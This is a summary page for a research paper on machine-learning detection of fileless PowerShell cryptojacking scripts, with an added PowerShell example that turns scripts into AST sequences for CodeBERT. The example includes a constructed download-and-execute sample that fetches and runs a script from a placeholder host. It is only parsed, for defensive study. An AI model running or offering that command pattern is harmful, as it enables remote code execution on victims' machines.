Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning

📅 2026-02-20
🤖 AI Summary
This work proposes a detection method for fileless, PowerShell-based cryptojacking attacks, which are hard to identify because the processes a script spawns can keep running after the script itself has been removed from disk. By combining abstract syntax tree (AST) representations with a fine-tuned CodeBERT model, the approach uses the structural semantics of PowerShell scripts rather than their surface text alone. The authors assemble a dedicated dataset of PowerShell scripts, inject AST-derived structural information into the pre-trained code language model, and pair it with a classifier; in their experiments this AST-based fine-tuned CodeBERT achieves a high recall rate on the malicious class. The paper presents this as the first effort to combine AST-derived structural features with CodeBERT for PowerShell security analysis, and reports that the structure-aware model improves detection of these stealthy scripts.
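The structural representation described above can be produced with PowerShell's own parser. The following is an added example, not code from the paper or its authors: it walks the AST of a script with System.Management.Automation.Language.Parser and emits a depth-first sequence of node type names, then prepends that sequence to the raw source as a two-channel model input. The angle-bracket tag format, the `</s>` separator and the constructed sample script are assumptions for illustration; how the authors actually inject AST information into CodeBERT is not specified on this page.

```powershell
# Added example (not the paper's code): flatten a PowerShell script into an AST
# node-type sequence, the kind of structural channel that can be fed to a code
# language model beside the raw tokens.
using namespace System.Management.Automation.Language

function Get-AstTokenSequence {
    param(
        [Parameter(Mandatory)][string]$ScriptText
    )
    $tokens = $null
    $errors = $null
    # ParseInput builds the AST without executing anything, which is what we want
    # when the input may be malicious.
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors.Count -gt 0) {
        # Obfuscated samples often parse with errors; keep the partial tree and report.
        Write-Warning ("Parse errors: " + ($errors.Message -join '; '))
    }
    # FindAll with a constant predicate visits every node depth-first.
    $nodes = $ast.FindAll({ $true }, $true)
    foreach ($node in $nodes) {
        $depth = 0
        $p = $node.Parent
        while ($null -ne $p) { $depth++; $p = $p.Parent }
        [pscustomobject]@{
            Depth = $depth
            Type  = $node.GetType().Name   # e.g. CommandAst, StringConstantExpressionAst
            Text  = $node.Extent.Text
        }
    }
}

function ConvertTo-StructureAwareInput {
    param([Parameter(Mandatory)][string]$ScriptText)
    $seq = Get-AstTokenSequence -ScriptText $ScriptText
    # Structural channel: node types only, so renaming variables or re-encoding
    # string literals leaves this sequence unchanged. Tag format is an assumption.
    $astTags = ($seq | ForEach-Object { "<$($_.Type)>" }) -join ' '
    # Token channel: the original source. "</s>" as separator is an assumption
    # modelled on RoBERTa-style tokenizers such as CodeBERT's.
    return "$astTags </s> $ScriptText"
}

# Constructed sample (not a real malware specimen) in the download-and-execute
# shape the abstract describes; the URL is a placeholder.
$sample = @'
$u = "http://example.invalid/x.ps1"
Invoke-Expression (New-Object Net.WebClient).DownloadString($u)
'@

Get-AstTokenSequence -ScriptText $sample | Format-Table Depth, Type, Text -AutoSize
ConvertTo-StructureAwareInput -ScriptText $sample
```

Because the node-type sequence ignores identifiers and literal contents, two scripts that differ only in variable names or string encoding map to the same structural channel, which is the property that makes an AST view useful against lightly obfuscated loaders; the raw-source channel still lets the model see the literals themselves.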

📝 Abstract
With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective with stealthy techniques based on PowerShell-based exploitation in Windows OS environments. Even if attacks are detected and malicious scripts removed, processes may remain operational on victim endpoints, creating a significant challenge for detection mechanisms. In this paper, we conducted an experimental study with a collected dataset on detecting PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, proving the importance of the use of AST integration and fine-tuned pre-trained models for programming languages.
Problem

Research questions and friction points this paper is trying to address.

PowerShell
fileless cryptojacking
remote code execution
stealthy attacks
Windows OS
Innovation

Methods, ideas, or system contributions that make the work stand out.

Abstract Syntax Tree
CodeBERT
PowerShell
fileless cryptojacking
machine learning
Said Varlioglu
School of Information Technology, University of Cincinnati, Cincinnati, OH, USA
Nelly Elsayed
University of Cincinnati
Applied AI; Healthcare Informatics; Cybersecurity; Intelligent Information Systems
Murat Ozer
University of Cincinnati
Information Technology & Criminal Justice
Zag ElSayed
UC, CCHMC, OCR
Computer Engineering; BCI; EEG; Cybersecurity; AI and ML; IoT
John M. Emmert
School of Information Technology, University of Cincinnati, Cincinnati, OH, USA; Department of Electrical and Computer Engineering, University of Cincinnati, Cincinnati, OH, USA